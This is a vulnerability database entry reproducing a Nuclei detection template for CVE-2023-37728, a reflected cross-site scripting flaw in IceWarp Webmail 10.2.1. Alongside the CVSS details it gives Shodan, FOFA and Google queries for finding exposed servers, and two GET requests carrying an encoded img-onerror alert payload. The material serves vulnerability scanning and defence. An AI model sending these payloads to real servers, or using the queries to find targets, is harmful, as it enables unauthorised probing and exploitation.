Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2023-37728
HistoryOct 16, 2023 - 6:24 p.m.

IceWarp Webmail Server v10.2.1 - Cross Site Scripting

2023-10-1618:24:57
ProjectDiscovery
github.com
7
cve
icewarp
xss
vulnerability
webmail
color parameter

CVSS3

6.1

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

EPSS

0.004

Percentile

72.5%

Icewarp Icearp v10.2.1 was discovered to contain a cross-site scripting (XSS) vulnerability via the color parameter.
id: CVE-2023-37728

info:
  name: IceWarp Webmail Server v10.2.1 - Cross Site Scripting
  author: technicaljunkie,r3Y3r53
  severity: medium
  description: |
    Icewarp Icearp v10.2.1 was discovered to contain a cross-site scripting (XSS) vulnerability via the color parameter.
  reference:
    - https://medium.com/@ayush.engr29/cve-2023-37728-6dfb7586311
    - https://nvd.nist.gov/vuln/detail/CVE-2023-37728
    - http://icearp.com
    - http://icewarp.com
    - https://medium.com/%40ayush.engr29/cve-2023-37728-6dfb7586311
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2023-37728
    cwe-id: CWE-79
    epss-score: 0.0035
    epss-percentile: 0.71791
    cpe: cpe:2.3:a:icewarp:icewarp:10.2.1:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: icewarp
    product: icewarp
    shodan-query:
      - http.favicon.hash:2144485375
      - http.title:"icewarp"
    fofa-query:
      - title="icewarp"
      - icon_hash=2144485375
    google-query: intitle:"icewarp"
  tags: cve,cve2023,icearp,icewarp,xss

http:
  - method: GET
    path:
      - "{{BaseURL}}/webmail/?color=%22%3e%3cimg%20src%20onerror%3dalert(document.domain)%3e%3c%22%27"
      - "{{BaseURL}}/?color=%22%3e%3cimg%20src%20onerror%3dalert(document.domain)%3e%3c%22%27"

    stop-at-first-match: true
    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(content_type, "text/html")'
          - 'contains(header, "IceWarp") || contains(body, "IceWarp WebClient")'
          - 'contains(body, "<img src onerror=alert(document.domain)>")'
        condition: and
# digest: 4b0a00483046022100c1039a707e093f50dc7ad75f85cd8933914227dbd16cc520cdea48b2fa5173460221009640d40fea17c786d19eb1047f3543f11316fd30a90a101b9177a8c109a751cd:922c64590222798bb761d5b6d8e72950

CVSS3

6.1

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

EPSS

0.004

Percentile

72.5%

Related for NUCLEI:CVE-2023-37728